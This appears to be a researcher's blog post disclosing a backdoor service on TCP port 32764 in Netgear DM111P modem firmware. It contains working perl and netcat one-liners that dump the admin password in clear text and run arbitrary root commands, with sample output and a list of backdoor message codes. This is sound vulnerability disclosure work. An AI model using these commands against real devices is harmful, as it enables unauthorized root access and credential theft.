Netgear DM111P backdoor?

After reading @elvanderb‘s tweet about a backdoor in his Linksys WAG200G, I checked my Netgear DM111P DSL modem (running firmware V2.00.27_WW) and found that TCP/32764 was opened and responding in a similar way.

The admin’s HTTP password is also exposed in clear through the scfgmgr process listening on TCP/32764:

$ perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.0.1 32764 \
| perl -n0e 'chomp;print"$_\n"' \
| grep ^http_

Output:

http_username=admin
http_password=***password*in*clear***
http_timeout=5

• https://github.com/elvanderb/TCP-32764

More important, is the ability to execute arbitrary shell commands as root (with a code 7 message)!

$ perl -e '$c="ps";print pack("(III)<", 0x53634d4d, 0x07, length($c)).$c' \
| nc 192.168.0.1 32764
MMcS?  PID  Uid        VSZ Stat Command
    1 root       1268 S   init       
    2 root            SW  [keventd]
    3 root            RWN [ksoftirqd_CPU0]
    4 root            SW  [kswapd]
    5 root            SW  [bdflush]
    6 root            SW  [kupdated]
    7 root            SW  [swapper]
    8 root            SW  [mtdblockd]
   55 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   56 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   57 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   65 root        628 S   /sbin/klogd 
  125 root       1148 S   dnrd -a 192.168.0.1 -m hosts -c off --timeout=0 -b 
  130 root        620 S   /usr/sbin/crond 
  131 root        652 S   /sbin/syslogd -f /etc/syslog.conf 
  133 root        868 S   /usr/sbin/scfgmgr 
  135 root        600 S   /usr/sbin/atm_monitor init 
  141 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
  142 root        596 S   /usr/sbin/cmd_agent_ap 
  143 root        596 S   /usr/sbin/pb_ap 
  137 root            SW  [autbtex]
  138 root            SW  [atm_led_complet]
  139 root            SW  [pmex_ne]
  140 root            SW  [pmex_fe]
  163 root       1268 S   init       
  165 root        672 S   /usr/sbin/mini_httpd -d /www -r NETGEAR DM111P  ADSL2
  228 root        612 S   /sbin/br2684ctld 
  755 root        996 S   /usr/sbin/scfgmgr 
  756 root       1268 S   sh -c ps 
  757 root       1272 R   ps

Further inspection:

• Download http://www.downloads.netgear.com/files/GDC/DM111Pv2/DM111Pv2%20Firmware%20Version%202.00.26%20(All%20regions%20except%20North%20America).zip (file is labeled with version 2.00.26 but contains version 2.00.27).
• Unpack zip.
• Follow devttys0.com instructions for extracting the squashfs image.
• Disassemble scfgmgr.

List of message’s code for DM111P:

• 1: Get all nvram variables (open/lseek/read on /tmp/nvram)(contains PPPoE passwords, HTTP admin password, etc.)
• 2: Get a specific nvram variable (nvram_get)
• 3: Set a specific nvram variable (parse string with strtok and call nvram_set)
• 4: Commit nvram variables (nvram_commit)
• 5: Reset WAN mode ? (nvram_set wan_mode=bridge, wan_encap=0, wan_vpi=8, wan_vci=81, and finally /usr/sbin/rc wan restart&)
• 6: Get ADSL (up|down)stream speed %dKbps/%dKbps (fopen/fscanf on /tmp/adsl/downstream and /tmp/adsl/upstream/)
• 7: Execute arbitrary commands through popen!!!
• 8: Write content to /tmp/%s file
• 9: Get version from /etc/version
• 10: Get nvram value of variable lan_ipaddr
• 11: Restore default nvram variables (nvram_set restore_default=1)
• 12: fopen/fseek/fread on /dev/mtdblock/5?
• 13: nvram_load followed by nvram_commit?
• 14: Set firmware BOOT options? (execute /usr/sbin/fw_env %s %s through a system call)
• 20: Get WAN interface MAC address? (nvram_get wan_macaddr_def)

Update:

• Here is my try at recompiling a firmware with a neutralized scfgmgr